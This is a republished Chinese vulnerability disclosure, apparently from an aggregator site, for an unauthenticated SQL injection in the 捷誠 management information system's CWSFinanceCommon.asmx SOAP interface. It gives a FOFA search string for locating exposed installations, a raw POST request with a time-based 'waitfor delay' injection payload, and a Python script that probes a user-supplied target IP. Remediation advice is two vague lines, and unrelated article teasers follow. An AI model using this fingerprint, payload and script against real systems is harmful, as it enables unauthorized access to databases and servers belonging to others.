捷誠管理信息系統 SQL注入漏洞

聲明
本文僅用于技術交流,請勿用于非法用途
由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,文章作者不為此承擔任何責任。

一、產品介紹

捷誠管理信息系統是一款功能全面,可以支持自營、聯營到外柜租賃的管理,其自身帶工作流管理工具,能夠幫助企業有效的開展內部審批工作。

二、漏洞描述

該系統CWSFinanceCommon.asmx接口存在SQL注入漏洞。未經身份認證的攻擊者可以通過該漏洞獲取數據庫敏感信息,深入利用可獲取服務器權限。

三、fofa語法

body="/Scripts/EnjoyMsg.js"

?四、漏洞復現

重放

poc

POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetOSpById xmlns="http://tempuri.org/"><sId>1';waitfor delay '0:0:5'--+</sId></GetOSpById></soap:Body>
</soap:Envelope>

?python檢測腳本

import timeimport requestsdef verify(ip):url = f'{ip}EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx'headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','Connection': 'close','Content-Length': '369','Accept': '*/*','Accept-Language': 'en','Content-Type': 'text/xml; charset=utf-8','Accept-Encoding': 'gzip',}payload = '''<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetOSpById xmlns="http://tempuri.org/"><sId>1';waitfor delay '0:0:5'--+</sId></GetOSpById></soap:Body></soap:Envelope>'''try:start_time = time.time()response = requests.post(url, headers=headers, data=payload,verify=False)end_time = time.time()res_time = end_time - start_time# 驗證成功輸出相關信息if response.status_code == 200 and res_time > 5 and res_time < 8:print(f"{ip}存在捷誠管理信息系統SQL注入漏洞!!!")except Exception as e:passif __name__ == '__main__':self = input('請輸入目標主機IP地址:')verify(self)

?使用方法

五、修復建議

盡快修復漏洞,更新系統

設置訪問控制策略

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/163618.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/163618.shtml
英文地址,請注明出處:http://en.pswp.cn/news/163618.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

地埋式積水監測儀廠家直銷推薦,致力于積水監測

地埋式積水監測儀是一種高科技設備&#xff0c;能夠實時監測地面積水深度&#xff0c;并及時發出預警信息&#xff0c;有效避免因積水而產生的安全隱患。這種智能監測儀可以安裝在城市道路、立交橋、地下車庫等易積水地勢較低的地方&#xff0c;以確保及時監測特殊地段的積水&a…

數據庫數據恢復—SQLserver數據庫中勒索病毒被加密的數據恢復案例

SQLserver數據庫數據恢復環境&故障&#xff1a; 一臺服務器上的SQLserver數據庫被勒索病毒加密&#xff0c;無法正常使用。該服務器上部署有多個SQLserver數據庫&#xff0c;其中有2個數據庫及備份文件被加密&#xff0c;文件名被篡改&#xff0c;數據庫無法使用。 SQL se…

基于框架的線性回歸

線性回歸是機器學習中最簡單和最常用的回歸方法之一。它建立了自變量和因變量之間的線性關系&#xff0c;并通過擬合一條直線或超平面來預測和分析數據。 基于框架的線性回歸是構建線性回歸模型的一種常見方法&#xff0c;它利用現有的機器學習框架來實現線性回歸模型的建立、…

企業郵箱即時提醒服務推薦

現在用企業郵箱比較多&#xff0c;但是不能即時提醒&#xff0c;總是誤事&#xff0c;什么郵箱可以即時提醒呢&#xff1f;隨著工作和生活節奏的加快&#xff0c;傳統的電子郵件系統由于不能即時提醒&#xff0c;往往會導致重要郵件的漏接&#xff0c;從而引發一系列的麻煩和誤…

探秘ARouter:Android路由的藝術

引言 在Android的組件化架構中&#xff0c;有效地管理活動&#xff08;Activity&#xff09;跳轉和服務調用是至關重要的。ARouter作為一個前沿的路由框架&#xff0c;提供了強大的工具來簡化這一過程。本博客將深入探討ARouter的實現原理&#xff0c;幫助開發者更好地理解其背…

postgresql docker 安裝和需要關注點

1. 關于 最近都在搞國產化信創&#xff0c;關于DB這塊也來一波浪潮&#xff0c;很多國產化的數據庫也是基于postgesql研發的。 PostgreSQL開源生態是國內數據庫發展及應用的強大引擎&#xff0c;越來越多的國產數據庫選擇加入到PostgreSQL生態中&#xff0c;開枝散葉。 看下官…

理解C++編譯指令#pragma pack(1)

#pragma pack(1)是一個編譯器指令&#xff0c;它用來指定結構體&#xff0c;聯合體&#xff0c;和類的成員的內存對齊方式。內存對齊是一種優化內存訪問速度的技術&#xff0c;它會根據數據類型的大小來調整數據在內存中的位置&#xff0c;使得數據的起始地址是它的大小的整數倍…

Python基礎【三】--數據類型-Number【2023.11.23】

1.數值類型 Number數據類型只要包括三個分別是&#xff1a;整型&#xff08;int&#xff09;、浮點型&#xff08;float&#xff09;、復數&#xff08;complex&#xff09; 整型&#xff1a;包括正整數、負整數。如&#xff1a;1024、-1024。整型有四種進制表示&#xff0c;分…

QGIS之二十五兩個面圖層數據中選擇圖形完全一致的數據

效果 步驟 1、準備數據 2、按位置選擇 在Qgis工具箱中搜索"按位置選擇"工具 選擇要素和比較要素根據實際選擇 運行 3、結果

JAVA爬蟲1 - HttpClient的使用

一、簡介 HttpClient 是 Apache Jakarta Common 下的子項目,用來提供高效的、最新的、功能豐富的支持 HTTP協議的客戶端編程工具包,并且它支持HTTP協議最新的版本和建議。HttpClient已經應用在很多的 項目中,比如Apache Jakarta上很著名的另外兩個開源項目Cactus和HTMLUnit…

解決錯誤0x80071ac3的問題,錯誤代碼0x80071ac3的原因

在使用電腦的過程中可能會出現錯誤0x80071ac3的代碼問題&#xff0c;一旦出現這樣的問題解決起來可能會有點麻煩&#xff0c;其實這個錯誤是和磁盤的問題相關&#xff0c;可以將電腦重啟嘗試能否解決錯誤0x80071ac3問題&#xff0c;如果依然不能解決問題的話&#xff0c;那么大…

XC3320 離線式、無電感交流輸入線性穩壓器 可替代KP3310 固定5V輸出電壓

XC3320 是一款緊湊型無電感設計的離線式線性穩壓器。XC3320 可獲得 5V輸出電壓。XC3320 是一種簡單可靠的獲得偏置供電的離線式電源解決方案。XC3320 集成了 650V 功率 MOSFET&#xff0c;啟動控制電路,VDD 電壓控制電路,AC 交流信號同步檢測電路&#xff0c;低壓差穩壓器等。該…

Linux免密登錄——A登錄B密鑰設置(SSH SCP)

密鑰登錄 密鑰登錄比帳號密碼方式更安全、更方便&#xff0c;并提供了更多的自動化和批處理選項。 安全性&#xff1a;使用非對稱加密算法&#xff0c;公鑰存在服務器&#xff0c;私鑰存在本地計算機&#xff0c;私鑰不在網絡傳輸&#xff0c;降低被黑客截獲風險。強密碼&#…

Windows使用WSL編譯自己的JDK

Windows使用WSL編譯自己的JDK 一、獲取源碼二、構建編譯環境三、進行編譯驗證編譯結果 四、配置環境變量五、使用CLion進行調試 參考資料&#xff1a;《深入理解java虛擬機》 筆者使用的操作系統為windows&#xff0c;但是windows編譯自己的jdk還是比較麻煩的&#xff0c;所以我…

張弛語言課奇幻劇配音,一場特殊的體驗

在為奇幻劇進行配音時&#xff0c;配音藝術家要將自己投入到一個充斥著魔法、幻想生物和超自然現象的虛構世界中。奇幻劇側重于構建一個超越現實的幻境&#xff0c;因此配音工作要求既要呈現角色的個性化特征&#xff0c;也要與劇中的奇幻氛圍相得益彰。以下是進行奇幻劇配音的…

主內存與工作內存數據交換八個步驟:

一&#xff1a;鎖定&#xff1a;把主內存內一個變量標識為一條線程獨占的狀態&#xff1b; 二&#xff1a;解鎖&#xff1a;把一個處于鎖定狀態的變量釋放出來。釋放后可被其他線程鎖定&#xff1b; 三&#xff1a;讀取&#xff1a;把一個變量的值從主內存傳輸到工作內存中&a…

12.你知道Spring的哪些擴展點,在什么時候調用?

Spring中非常非常多的擴展接口,當然你也不需要全部回答,可以挑重點回答: 執行BeanFactoryPostProcessor的postProcessBeanFactory方法1 /*** 2 * 作用: 在注冊BeanDefinition的可以對beanFactory進行擴展 后 3 * 調用時機: Ioc加載時注冊BeanDefinition 的時候會調用 4 */…

【C/C++】簡單模擬題解

有52張樸克牌&#xff0c;使它們全部正面朝上。從第2張牌開始&#xff0c;把凡是2的倍數位置上的牌翻成正面朝下&#xff1b;接著從第3張牌開始&#xff0c;把凡是3的倍數位置上的牌正面朝上的翻成正面朝下&#xff0c;正面朝下的翻成正面朝上&#xff1b;接著從第4張牌開始&am…

太神奇了!視頻監控技術居然還能操作

隨著科技的迅猛發展&#xff0c;視頻監控系統在各個領域中的應用變得越來越廣泛。從保護公共安全到提高工作效率&#xff0c;視頻監控為我們提供了一種強大而多功能的工具。 視頻監控技術已經成為我們日常生活和工作中不可或缺的一部分。通過視頻監控&#xff0c;我們能夠實時監…

shell循環語句 for while until

目錄 什么是循環語句 概念 for循環 格式 while循環 格式 until 循環 格式 實驗 for &#xff08;1&#xff09;計算1到100的和 ?編輯 &#xff08;2&#xff09;100以內的偶數 &#xff08;從0開始到100結束&#xff0c;每次加2步 打印的都是偶數&#xff09; &…